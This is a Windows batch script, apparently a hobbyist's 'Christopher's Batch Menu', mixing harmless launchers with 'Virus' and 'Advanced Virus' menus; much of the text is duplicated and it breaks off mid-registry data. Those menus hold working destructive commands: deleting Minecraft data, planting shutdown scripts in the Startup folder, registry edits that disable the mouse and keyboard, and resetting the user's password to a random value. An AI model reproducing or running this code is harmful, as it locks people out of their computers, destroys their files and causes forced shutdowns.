set /p folder_Path= Where would you like to dump the folders? [Requires Location eg, %windir%]-
set /p folder_amount= How many folders would you like to dump?
cd %folder_Path%
for /l %%n in (1,1,%folder_amount%) DO md %%n
echo #%folder_amount% folders dumped at location: %folder_path%.
pause
cls
GOTO Menu
:Virus_iExplorer
echo Note: Your computer may slow down at the amount of iExplorer's being opened.
echo Menu - Go Back to Main Menu.
echo Back - Go Back to iExplorer Menu
echo Quit - Quit the Batch
set /p virus_iExplorer_amount= How many would iExplorer's would you like to open?
set _number=0
:virus_iexplorer_start
if %_number%==%virus_iexplorer_amount% goto Virus_iExplorer_end goto :virus_iexplorer_end
if %_number%==Menu goto :Menu
if %_number%==Back goto :Virus_iExplorer
if %_number%==Quit goto :Quit
set /a _number +=1
echo Hi
goto virus_iexplorer_start
:virus_iexplorer_end
pause
cls
GOTO Menu
:Virus_Minecraft
echo 1 - Delete Minecraft Contents
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_minecraft_delete= What would you like to do?:
IF %VIRUS_MINECRAFT_DELETE%==1 GOTO :virus_minecraft_true
IF %VIRUS_MINECRAFT_DELETE%==2 GOTO :Virus
IF %VIRUS_MINECRAFT_DELETE%==3 GOTO :Quit
:Virus_minecraft_true
del /s /q /s /q %appdata%\.minecraft\
del /s /q %appdata%\.minecraft\bin
del /s /q %appdata%\.minecraft\bin\natives
del /s /q %appdata%\.minecraft\mods
del /s /q %appdata%\.minecraft\resources
del /s /q %appdata%\.minecraft\resources\music
del /s /q %appdata%\.minecraft\resources\newmusic
del /s /q %appdata%\.minecraft\resources\newsound
del /s /q %appdata%\.minecraft\resources\sound
del /s /q %appdata%\.minecraft\resources\streaming
del /s /q %appdata%\.minecraft\saves
del /s /q %appdata%\.minecraft\screenshots
del /s /q %appdata%\.minecraft\stats
del /s /q %appdata%\.minecraft\texturepacks
pause
cls
GOTO Menu
:Virus_Start-up
echo Note: Shutdown files are Required to work. [Untill I Can get the /set command working]
echo 1 - Instant Shutdown
echo 2 - Shutdown w/ 60seconds
echo 3 - shutdown w/ 300 seconds
echo 4 - Go Back
echo 5 - Exit Batch
set /p virus_start-up_shutdown= What would you like to do?:
IF %virus_start-up_shutdown%==1 GOTO :virus_start-up_Ishutdown
IF %virus_start-up_shutdown%==2 GOTO :virus_start-up_60shutdown
IF %virus_start-up_shutdown%==3 GOTO :virus_start-up_300shutdown
IF %virus_start-up_shutdown%==4 GOTO :Virus
IF %virus_start-up_shutdown%==5 GOTO :Quit
:Virus_start-up_Ishutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p Virus_start-up_IShutdown_Options= What would you like to do?:
IF %Virus_start-up_IShutdown_Options%==1 GOTO :Virus_Start-up_IShutdown_True
IF %virus_start-up_IShutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_IShutdown_Options%==3 GOTO :Quit
:Virus_Start-up_IShutdown_True
xcopy "%cd%\DON'T_EDIT_ShutdownI.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:virus_start-up_60shutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_start-up_60shutdown_Options= What would you like to do?:
IF %virus_start-up_60shutdown_Options%==1 GOTO :virus_start-up_60shutdown_True
IF %virus_start-up_60shutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_60shutdown_Options%==3 GOTO :Quit
:virus_start-up_60shutdown_True
xcopy "%cd%\DON'T_EDIT_60Shutdown.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:virus_start-up_300shutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_start-up_300shutdown_Options= What would you like to do?:
IF %virus_start-up_300shutdown_Options%==1 GOTO :virus_start-up_300shutdown_True
IF %virus_start-up_300shutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_300shutdown_Options%==3 GOTO :Quit
:virus_start-up_300shutdown_True
xcopy "%cd%\DON'T_EDIT_300Shutdown.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:Virus_Keylogger
echo Note: This basically does nothing except save characters into a text file.
echo Note: Press Enter to save and go back to the Menu.
echo Keylogger .txt saved at %userprofile%.
echo >>%userprofile%\keys.txt
echo Keylogger Activated, Check %userprofile%\Keylogger.txt
set /p keys=
echo %keys%>>%userprofile%\Keylogger.txt
pause
cls
GOTO Menu
:Admin
echo Hello, You have Possibly edited the file or found out this secret area!
echo There is nothing here at all.
echo Good-bye
echo [This is usually used for my Practise area]
pause
cls
GOTO Menu
:N/A
cls
echo - Christopher's Batch Menu.
echo Hello, You have found a glitch in the system!
echo By Scott how did this happen?
echo Or else you somehow made it here via the menu.
echo -----------
echo Long story short, theres nothing here.
pause
cls
GOTO Menu
:A_Virus
cls
echo - Christopher's Batch Menu.
echo Note: Any harm done with these tools is none of Chris' fault and refer to the user whom did it.
echo Note: These are the "Big Boy Tools" Most of these will cause some harm and/or Damage.
echo 1 - Disable Mouse / Keyboard / Swap Mouse Buttons [Thanks to ".JiampyPotter" at NextGenUpdate]
echo 2 - Change %username%'s Password.
set /p A_Virus_Question= What would you like to do?:
IF %A_Virus_Question%==1 GOTO :A_Virus_K/A_D
IF %A_Virus_Question%==2 GOTO :A_Virus_Pass
:A_Virus_K/A_D
echo Thanks to "In Shadow Batch Virus Generator - v4.1.2"
echo Creator: ".JiampyPotter" at NextGenUpdate
echo 1 - Disable Mouse.
echo 2 - Disable Keyboard.
echo 3 - Swap Mouse Buttons.
echo 4 - Change %username%'s Password
echo 3 - Go Back.
echo 4 - Quit.
set /p A_Virus_K/A_D_Question= What would you like to do?:
IF %A_Virus_Question%==1 GOTO :A_Virus_K/A_D_Mouse
IF %A_Virus_Question%==2 GOTO :A_Virus_K/A_D_Keyboard
IF %A_Virus_Question%==3 GOTO :A_Virus_K/A_D
IF %A_Virus_Question%==4 GOTO :QUIT
:A_Virus_K/A_D_Mouse
echo Are you sure you want to disable the mouse?
echo 1 - Yes
echo 2 - No
set /p A_Virus_K/A_D_Mouse_Question= What would you like to do?
IF %A_Virus_K/A_D_Mouse_Question%==1 GOTO :A_Virus_K/A_D_Mouse_True
IF %A_Virus_K/A_D_Mouse_Question%==1 GOTO :A_Virus
:A_Virus_K/A_D_Mouse_True
SET Key= "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %KEY%
reg add %KEY% /v Start /t REG_DWORD /d 4
pause
cls
GOTO Menu
:A_Virus_K/A_D_Keyboard
echo Are you sure you want to disable the keyboard?
echo 1 - Yes
echo 2 - No
set /p A_Virus_K/A_D_Keyboard_Question= What would you like to do?:
IF %A_Virus_K/A_D_Keyboard_Question%==1 GOTO :A_Virus_K/A_D_Keyboard_True
IF %A_Virus_K/A_D_Keyboard_Question%==2 GOTO :A_Virus
:A_Virus_K/A_D_Keyboard_True
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
pause
cls
GOTO Menu
:A_Virus_SwapM
echo 1 - Swap Mouse Buttons.
echo 2 - Go Back.
echo 3 - Exit batch.
set /p A_Virus_SwapM_Question= What would you like to do?:
IF %A_Virus_SwapM_Question%==1 GOTO :A_Virus_SwapM_True
IF %A_Virus_SwapM_Question%==2 GOTO :A_Virus
IF %A_Virus_SwapM_Question%==3 GOTO :Quit
:A_Virus_SwapM_True
echo Mouse buttons swapping.
RUNDLL32 USER32.DLL,SwapMouseButton
pause
cls
GOTO Menu
:A_Virus_Pass
echo Note: This only changes the current users password.
echo 1 - Random password.
echo 2 - Custom password.
echo 3 - Go Back.
echo 4 - Exit Batch.
set /p A_Virus_Pass_Question= What would you like to do?:
IF %A_Virus_Pass_Question%==1 GOTO :A_Virus_Pass_Random
IF %A_Virus_Pass_Question%==2 GOTO :A_Virus_Pass_Custom
IF %A_Virus_Pass_Question%==3 GOTO :A_Virus
IF %A_Virus_Pass_Question%==4 GOTO :Quit
:A_Virus_Pass_Random
echo Are you sure you want to change the current password?
echo [Will Display new password]
echo 1 - Yes
echo 2 - No
set /p A_Virus_Pass_Random_Question= What would you like to do?:
IF %A_Virus_Pass_Random_Question%==1 GOTO :A_Virus_Pass_Random_True
IF %A_Virus_Pass_Random_Question%==2 GOTO :A_Virus
:A_Virus_Pass_Random_True
set /a A_Virus_Pass_Random_True_Randompass= %random%%random%
echo The new password is %A_Virus_Pass_Random_True_Randompass%
net user %username% %A_Virus_Pass_Random_True_Randompass%
pause
cls
GOTO Menu

@echo off
# Created by Chris Aldous
# Please don't edit this.
color 0e
title Chris' General Batch Launcher [D3V on NGU]
cls
GOTO Start
:Start2
cls
echo - Christopher's Batch Menu.
echo Hello %username%, Loading Menu...
ping localhost -n 2 > nul
ping localhost -n 2 > nul
ping localhost -n 1 > nul
ping localhost -n 1 > nul
GOTO Menu
:Menu
cls
echo - Welcome! to Christopher's Batch Menu.
echo 1 - Open Minecraft.
echo 2 - Computer Info.
echo 3 - Shutdown w/ Commands
echo 4 - Open Internet Explorer w/ Webpages
echo 5 - Open Folders, Locations, etc
echo 6 - Virus' Menu
echo 7 - Advanced Virus Menu
echo 8 - [Nothing - Empty - Reserved]
echo 9 - Copyright / Uses / Editing
echo 10 - Exit the Batch.
set /p QUESTION= What would you like to do?:
IF %QUESTION%==1 GOTO :MC
IF %QUESTION%==2 GOTO :Info
IF %QUESTION%==3 GOTO :Shut
IF %QUESTION%==4 GOTO :iExplorer
IF %QUESTION%==5 GOTO :Folders
IF %QUESTION%==6 GOTO :Virus
IF %QUESTION%==7 GOTO :A_Virus
IF %QUESTION%==8 GOTO :N/A
IF %QUESTION%==9 GOTO :Copyright
IF %QUESTION%==10 GOTO :QUIT
IF %QUESTION%==Admin GOTO :Admin
:MC
cls
echo - Christopher's Batch Menu.
echo 1 - Open Minecraft with 512MB Memory.
echo 2 - Open Minecraft with 1GB Memory.
echo 3 - Go Back.
echo 4 - Exit the Batch.
set /p QUESTION2= What would you like to do?:
IF %QUESTION2%==1 GOTO :MC512
IF %QUESTION2%==2 GOTO :MC1GB
IF %QUESTION2%==3 GOTO :Menu
IF %QUESTION2%==4 GOTO :QUIT
:QUIT
echo Thank you for using Chris' Batch file.
%QUESTION2%
ping localhost -n 2 > nul
ping localhost -n 2 > nul
exit
:MC512
set /p Name = What would you like your name for online to be?:
java -Xms512m -Xmx1024m -cp "%APPDATA%\.minecraft\bin\*" -Djava.library.path="%APPDATA%\.minecraft\bin\natives" net.minecraft.client.Minecraft "%Name%"
"%Name%"
pause
cls
GOTO Menu
:MC1GB
set /p Name = What would you like your name for online to be?:
java -Xms1024m -Xmx2056m -cp "%APPDATA%\.minecraft\bin\*" -Djava.library.path="%APPDATA%\.minecraft\bin\natives" net.minecraft.client.Minecraft "%Name%"
pause
cls
GOTO Menu
:Info
cls
echo - Christopher's Batch Menu.
echo Logged in as: %username%
echo Computer Name: %COMPUTERNAME%
time /t
date /t
echo --------
echo Your Directory: %windir%
echo Your User Profile %userprofile%
echo Operating System: %OS%
echo Number of Processors: %NUMBER_OF_PROCESSORS%
echo System Drive: %SystemDrive%
pause
cls
GOto Menu
:Shut
cls
echo - Christopher's Batch Menu.
echo 1 - Shutdown w/ Timer
echo 2 - Shutdown w/ Timer, Comment
echo 3 - Shutdown w/ Timer, Restart
echo 4 - Abort Shutdown.
echo 5 - Go Back.
echo 6 - Exit Batch.
set /p QUESTION3= What would you like to do?
IF %QUESTION3%==1 GOTO :Shut-t
IF %QUESTION3%==2 GOTO :Shut-t-c
IF %QUESTION3%==3 GOTO :Shut-r
IF %QUESTION3%==4 GOTO :shut-a
IF %QUESTION3%==5 GOTO :Menu
IF %QUESTION3%==6 GOTO :Quit
:Shut-t
cls
echo - Christopher's Batch Menu.
set /p Shutdown_timer= How long untill your computer shutsdown? [In Seconds]
shutdown -s -t %Shutdown_timer%
echo Time set for: %Shutdown_timer% seconds.
pause
cls
GOTO Menu
:shut-t-c
cls
echo - Christopher's Batch Menu.
set /p shutdown_timer1= How Long untill your Computer shutsdown? [In Seconds]-
set /p shutdown_comment= What would you like your comment to be? [No Spaces]-
shutdown -s -t %shutdown_timer1% -c %shutdown_comment%
echo Timer set for: %shutdown_timer1% seconds.
echo Comment set for: %shutdown_comment%.
pause
cls
GOTO Menu
:shut-
cls
echo - Christopher's Batch Menu.
set /p shutdown_restart= How Long untill your Computer Restarts? [In Seconds]-
shutdown -r -t %shutdown_restart%
echo Restart set for: %shutdown_restart% seconds.
pause
cls
GOTO Menu
:shut-a
cls
echo - Christopher's Batch Menu.
echo 1 - Abort Shutdown.
echo 2 - Back to Menu.
set /p shutdown_abort= What Would you like to do?:
IF %shutdown_abort%==1 GOTO :shutdown_abort_true
IF %shutdown_abort%==2 GOTO :Menu
:shutdown_abort_true
cls
echo - Christopher's Batch Menu.
shutdown -a
echo Shutdown Aborted or No Shutdown was found.
pause
cls
GOTO Menu
:iExplorer
cls
echo - Christopher's Batch Menu.
echo Note: These do not Bypass Firewalls/Proxies etc.
echo 1 - Open Internet Explorer.
echo 2 - Google.com
echo 3 - Facbook.com
echo 4 - Go Back.
echo 5 - Exit Batch
echo [Might add more later?]
set /p iExplorer_open= What would you like to do?:
IF %iExplorer_open%==1 GOTO :iExplorer_start
IF %iExplorer_open%==2 GOTO :iExplorer_Google
IF %iExplorer_open%==3 GOTO :iExplorer_Facebook
IF %iExplorer_open%==4 GOTO :Menu
IF %iExplorer_open%==5 GOTO :Quit
:iExplorer_google
start iexplore https://www.google.com.au
pause
cls
GOTO Menu
:iExplorer_facebook
start iexplore https://www.facebook.com/
pause
cls
GOTO Menu
:iExplorer_start
start iexplore
pause
cls
GOTO Menu
:Folders
cls
echo - Christopher's Batch Menu.
echo 1 - Drive C:\
echo 2 - %username%'s Folders
echo 3 - ProgramData Folder
echo 4 - System Root
echo 5 - Public Folder
echo 6 - Start-up Folder
echo 7 - Go Back.
echo 8 - Exit Batch.
set /p folder_open= What would you like to do?:
IF %folder_open%==1 GOTO :folder_c
IF %folder_open%==2 GOTO :folder_Username
IF %folder_open%==3 GOTO :folder_prodata
IF %folder_open%==4 GOTO :folder_sysroot
IF %folder_open%==5 GOTO :folder_public
IF %folder_open%==6 GOTO :folder_startup
IF %folder_open%==7 GOTO :Menu
IF %folder_open%==8 GOTO :Quit
:folder_c
start C:\
pause
cls
GOTO Menu
:folder_username
start %userprofile%
pause
cls
GOTO Menu
:folder_prodata
start %programdata%
pause
cls
GOTO Menu
:folder_sysroot
start %systemroot%
pause
cls
GOTO Menu
:folder_public
start %PUBLIC%
pause
cls
GOTO Menu
:folder_startup
explorer %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
pause
cls
GOTO Menu
:Start
cls
echo - Welcome! to Christopher's Batch Menu.
echo Please do not claim this to be your material or any of your work
echo Editing of the file is frowned apon, (Adding more Links etc is allowed)
echo The Uses of this Batch is a general menu of everything I have learnt, and for a future reference.
echo Using this Batch file to help you make your files is allowed.
echo Minecraft will not work unless you have the game properly installed
echo Agreeing to this means you will (Hopefully) Follow these guidelines.
echo .
echo 1 - Yes
echo 2 - No
set /p start= Do You agree to these terms and conditions?:
IF %Start%==1 GOTO :Start2
IF %Start%==2 GOTO
elete
:Copyright
cls
echo - Christopher's Batch Menu.
echo Please do not claim this to be your material or any of your work
echo Editing of the file is frowned apon, (Adding more Links etc is allowed)
echo The Uses of this Batch is a general menu of everything I have learnt, and for a future reference.
echo Using this Batch file to help you make your files is allowed.
echo Minecraft will not work unless you have the game properly installed
echo Agreeing to this means you will (Hopefully) Follow these guidelines.
echo .
echo 1 - Go Back.
echo 2 - Exit Batch.
set /p start= What Would you like to do?:
IF %Start%==1 GOTO :Menu
IF %Start%==2 GOTO :Quit
:delete
del %o%
exit
:virus
cls
echo - Christopher's Batch Menu.
echo Note: Any harm done with these tools is none of Chris' fault and refer to the user whom did it.
echo 1 - Folder spammer.
echo 2 - iExploer Dumper.
echo 3 - Minecraft Deletor.
echo 4 - Start-up Shutdown.
echo 5 - CMD Keylogger.
echo 6 - Go Back.
echo 7 - Exit Batch.
set /p Virus= What would you like to do?:
IF %Virus%==1 GOTO :Virus_Folder
IF %Virus%==2 GOTO :Virus_iExplorer
IF %Virus%==3 GOTO :Virus_Minecraft
IF %Virus%==4 GOTO :Virus_Start-up
IF %Virus%==5 GOTO :Virus_Keylogger
IF %Virus%==6 GOTO :Menu
IF %Virus%==7 GOTO :Quit
:Virus_Folder
echo Note: Your computer will slow down untill the dumping process is complete.
echo 1 - Random Amount
echo 2 - Custom Amount
echo 3 - Go Back.
echo 4 - Exit Back
IF %Virus_Folder_Question%==1 GOTO :Virus_Folder_Random
IF %Virus_Folder_Question%==2 GOTO :Virus_Folder_Custom
IF %Virus_Folder_Question%==3 GOTO :Menu
IF %Virus_Folder_Question%==4 GOTO :Quit
:Virus_Folder_Random
echo Note: The Random amount can be from 1 - 50,000 [Usually]
set /p folder_path_random= Where would you like to dump the folders? [Requires Location eg, %windir%]-
cd %folder_path_random%
set /p random1= The Random number is %Random%
echo Would you like to continue?
echo 1 - Yes
echo 2 - Go Back
echo 3 - Menu
echo 4 - Exit the Batch
set /p folder_random_Continue= What would you like to do?:
IF %folder_random_continue%==1 GOTO :folder_random_True
IF %folder_random_continue%==2 GOTO :Virus_folder_Random
for /l %%n in (1,1,%folder_amount%) DO md %%n
echo #%folder_amount% folders dumped at location: %folder_path%.
pause
cls
GOTO Menu
:Virus_Folder_Custom
set /p folder_Path= Where would you like to dump the folders? [Requires Location eg, %windir%]-
set /p folder_amount= How many folders would you like to dump?
cd %folder_Path%
for /l %%n in (1,1,%folder_amount%) DO md %%n
echo #%folder_amount% folders dumped at location: %folder_path%.
pause
cls
GOTO Menu
:Virus_iExplorer
echo Note: Your computer may slow down at the amount of iExplorer's being opened.
echo Menu - Go Back to Main Menu.
echo Back - Go Back to iExplorer Menu
echo Quit - Quit the Batch
set /p virus_iExplorer_amount= How many would iExplorer's would you like to open?
set _number=0
:virus_iexplorer_start
if %_number%==%virus_iexplorer_amount% goto Virus_iExplorer_end goto :virus_iexplorer_end
if %_number%==Menu goto :Menu
if %_number%==Back goto :Virus_iExplorer
if %_number%==Quit goto :Quit
set /a _number +=1
echo Hi
goto virus_iexplorer_start
:virus_iexplorer_end
pause
cls
GOTO Menu
:Virus_Minecraft
echo 1 - Delete Minecraft Contents
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_minecraft_delete= What would you like to do?:
IF %VIRUS_MINECRAFT_DELETE%==1 GOTO :virus_minecraft_true
IF %VIRUS_MINECRAFT_DELETE%==2 GOTO :Virus
IF %VIRUS_MINECRAFT_DELETE%==3 GOTO :Quit
:Virus_minecraft_true
del /s /q /s /q %appdata%\.minecraft\
del /s /q %appdata%\.minecraft\bin
del /s /q %appdata%\.minecraft\bin\natives
del /s /q %appdata%\.minecraft\mods
del /s /q %appdata%\.minecraft\resources
del /s /q %appdata%\.minecraft\resources\music
del /s /q %appdata%\.minecraft\resources\newmusic
del /s /q %appdata%\.minecraft\resources\newsound
del /s /q %appdata%\.minecraft\resources\sound
del /s /q %appdata%\.minecraft\resources\streaming
del /s /q %appdata%\.minecraft\saves
del /s /q %appdata%\.minecraft\screenshots
del /s /q %appdata%\.minecraft\stats
del /s /q %appdata%\.minecraft\texturepacks
pause
cls
GOTO Menu
:Virus_Start-up
echo Note: Shutdown files are Required to work. [Untill I Can get the /set command working]
echo 1 - Instant Shutdown
echo 2 - Shutdown w/ 60seconds
echo 3 - shutdown w/ 300 seconds
echo 4 - Go Back
echo 5 - Exit Batch
set /p virus_start-up_shutdown= What would you like to do?:
IF %virus_start-up_shutdown%==1 GOTO :virus_start-up_Ishutdown
IF %virus_start-up_shutdown%==2 GOTO :virus_start-up_60shutdown
IF %virus_start-up_shutdown%==3 GOTO :virus_start-up_300shutdown
IF %virus_start-up_shutdown%==4 GOTO :Virus
IF %virus_start-up_shutdown%==5 GOTO :Quit
:Virus_start-up_Ishutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p Virus_start-up_IShutdown_Options= What would you like to do?:
IF %Virus_start-up_IShutdown_Options%==1 GOTO :Virus_Start-up_IShutdown_True
IF %virus_start-up_IShutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_IShutdown_Options%==3 GOTO :Quit
:Virus_Start-up_IShutdown_True
xcopy "%cd%\DON'T_EDIT_ShutdownI.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:virus_start-up_60shutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_start-up_60shutdown_Options= What would you like to do?:
IF %virus_start-up_60shutdown_Options%==1 GOTO :virus_start-up_60shutdown_True
IF %virus_start-up_60shutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_60shutdown_Options%==3 GOTO :Quit
:virus_start-up_60shutdown_True
xcopy "%cd%\DON'T_EDIT_60Shutdown.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:virus_start-up_300shutdown
echo 1 - Inject Shutdown file?
echo 2 - Go Back
echo 3 - Exit Batch
set /p virus_start-up_300shutdown_Options= What would you like to do?:
IF %virus_start-up_300shutdown_Options%==1 GOTO :virus_start-up_300shutdown_True
IF %virus_start-up_300shutdown_Options%==2 GOTO :Virus_Start-up_Shutdown
IF %virus_start-up_300shutdown_Options%==3 GOTO :Quit
:virus_start-up_300shutdown_True
xcopy "%cd%\DON'T_EDIT_300Shutdown.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
pause
cls
GOTO Menu
:Virus_Keylogger
echo Note: This basically does nothing except save characters into a text file.
echo Note: Press Enter to save and go back to the Menu.
echo Keylogger .txt saved at %userprofile%.
echo >>%userprofile%\keys.txt
echo Keylogger Activated, Check %userprofile%\Keylogger.txt
set /p keys=
echo %keys%>>%userprofile%\Keylogger.txt
pause
cls
GOTO Menu
:Admin
echo Hello, You have Possibly edited the file or found out this secret area!
echo There is nothing here at all.
echo Good-bye
echo [This is usually used for my Practise area]
pause
cls
GOTO Menu
:N/A
cls
echo - Christopher's Batch Menu.
echo Hello, You have found a glitch in the system!
echo By Scott how did this happen?
echo Or else you somehow made it here via the menu.
echo -----------
echo Long story short, theres nothing here.
pause
cls
GOTO Menu
:A_Virus
cls
echo - Christopher's Batch Menu.
echo Note: Any harm done with these tools is none of Chris' fault and refer to the user whom did it.
echo Note: These are the "Big Boy Tools" Most of these will cause some harm and/or Damage.
echo 1 - Disable Mouse / Keyboard / Swap Mouse Buttons [Thanks to ".JiampyPotter" at NextGenUpdate]
echo 2 - Change %username%'s Password.
set /p A_Virus_Question= What would you like to do?:
IF %A_Virus_Question%==1 GOTO :A_Virus_K/A_D
IF %A_Virus_Question%==2 GOTO :A_Virus_Pass
:A_Virus_K/A_D
echo Thanks to "In Shadow Batch Virus Generator - v4.1.2"
echo Creator: ".JiampyPotter" at NextGenUpdate
echo 1 - Disable Mouse.
echo 2 - Disable Keyboard.
echo 3 - Swap Mouse Buttons.
echo 4 - Change %username%'s Password
echo 3 - Go Back.
echo 4 - Quit.
set /p A_Virus_K/A_D_Question= What would you like to do?:
IF %A_Virus_Question%==1 GOTO :A_Virus_K/A_D_Mouse
IF %A_Virus_Question%==2 GOTO :A_Virus_K/A_D_Keyboard
IF %A_Virus_Question%==3 GOTO :A_Virus_K/A_D
IF %A_Virus_Question%==4 GOTO :QUIT
:A_Virus_K/A_D_Mouse
echo Are you sure you want to disable the mouse?
echo 1 - Yes
echo 2 - No
set /p A_Virus_K/A_D_Mouse_Question= What would you like to do?
IF %A_Virus_K/A_D_Mouse_Question%==1 GOTO :A_Virus_K/A_D_Mouse_True
IF %A_Virus_K/A_D_Mouse_Question%==1 GOTO :A_Virus
:A_Virus_K/A_D_Mouse_True
SET Key= "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %KEY%
reg add %KEY% /v Start /t REG_DWORD /d 4
pause
cls
GOTO Menu
:A_Virus_K/A_D_Keyboard
echo Are you sure you want to disable the keyboard?
echo 1 - Yes
echo 2 - No
set /p A_Virus_K/A_D_Keyboard_Question= What would you like to do?:
IF %A_Virus_K/A_D_Keyboard_Question%==1 GOTO :A_Virus_K/A_D_Keyboard_True
IF %A_Virus_K/A_D_Keyboard_Question%==2 GOTO :A_Virus
:A_Virus_K/A_D_Keyboard_True
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
